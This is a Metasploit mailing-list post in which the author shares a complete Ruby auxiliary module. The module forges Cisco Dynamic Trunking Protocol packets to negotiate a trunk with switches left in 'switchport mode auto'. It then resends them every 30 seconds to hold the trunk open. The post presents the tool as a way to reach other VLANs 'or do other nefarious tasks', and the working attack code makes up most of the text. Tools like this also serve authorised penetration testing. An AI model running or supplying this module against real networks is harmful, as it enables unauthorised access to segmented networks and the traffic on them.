Dynamic Trunk Protocol (DTP) Module

[Spencer McIntyre <zerosteiner () gmail com>]

I have written a module for Metasploit that will forge DTP packets to 
negotiate a trunk with a Cisco switch that has been improperly 
configured with the "switchport mode auto" setting.  This module, 
although not significant in itself, places the user in a position to add 
a 802.1Q interface onto their system and access another network or do 
other nefarious tasks.  It might be worth while to also mention that 
this is not exploiting a flaw within IOS but a feature.  I am currently 
testing a PVSTP+ module I have also written that works well in 
conjunction with this DTP module.

By default this module runs in the background and periodically sends a 
DTP packet to keep the trunk connection alive.  I hope someone else 
finds this useful.

Spencer McIntyre
zeroSteiner () gmail com

#begin auxiliary/spoof/cisco/dtp.rb
require 'msf/core'
require 'racket'

class Metasploit3 < Msf::Auxiliary

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Forge DTP Packets',
            'Description'    => %q{
                This module forges DTP packets to initialize a trunk port.
            },
            'Author'         => [ 'Spencer McIntyre' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 7 $',
            'Actions'     =>
                [
                     [ 'Service' ]
                ],
            'PassiveActions' =>
                [
                    'Service'
                ],
            'DefaultAction'  => 'Service'
        ))
        register_options([
            OptString.new('DOMAIN', [ false,  "DTP Domain Name", '']),
            OptString.new('IFACE', [ true,  "Interface To Use", 'eth0']),
        ], self.class)
    end

    def run
        n = Racket::Racket.new
        @run = true
        domain = datastore['DOMAIN']
        if domain == ""
            domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        end

        n.l2 = Racket::L2::Ethernet.new()
        n.l2.dst_mac = '01:00:0c:cc:cc:cc'    #this has to stay the same
        n.l2.ethertype = (domain.length + 34)

        n.l3 = Racket::L2::LLC.new()
        n.l3.control = 0x03
        n.l3.dsap = 0xaa
        n.l3.ssap = 0xaa
        cisco_vendor_code = "\x00\x00\x0c"
        pid = "\x20\x04"    #2004 is DTP
        n.l3.payload = cisco_vendor_code + pid

        #DTP info section
        dtp_version = "\x01"

        dtp_domain_type = "\x00\x01"
        dtp_domain_len = [ (domain.length + 5) ].pack("n")
        dtp_domain = domain + "\x00"
        dtp_domain_section = dtp_domain_type + dtp_domain_len + dtp_domain

        dtp_status_type = "\x00\x02"
        dtp_status_len = "\x00\x05"
        dtp_status = "\x03"
        dtp_status_section = dtp_status_type + dtp_status_len + dtp_status

        dtp_type_type = "\x00\x03"
        dtp_type_len = "\x00\x05"
        dtp_type = "\xa5"
        dtp_type_section = dtp_type_type + dtp_type_len + dtp_type

        dtp_neighbor_type = "\x00\x04"
        dtp_neighbor_len = "\x00\x0a"
        dtp_neighbor = "\x11\x22\x33\x44\x55\x66"
        dtp_neighbor_section = dtp_neighbor_type + dtp_neighbor_len + 
dtp_neighbor


        n.l3.payload += dtp_version + dtp_domain_section + 
dtp_status_section + dtp_type_section + dtp_neighbor_section

        n.iface = datastore['IFACE']
        n.pack()
        while @run
            n.send2()
            select(nil, nil, nil, 30)
        end

    end

end

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework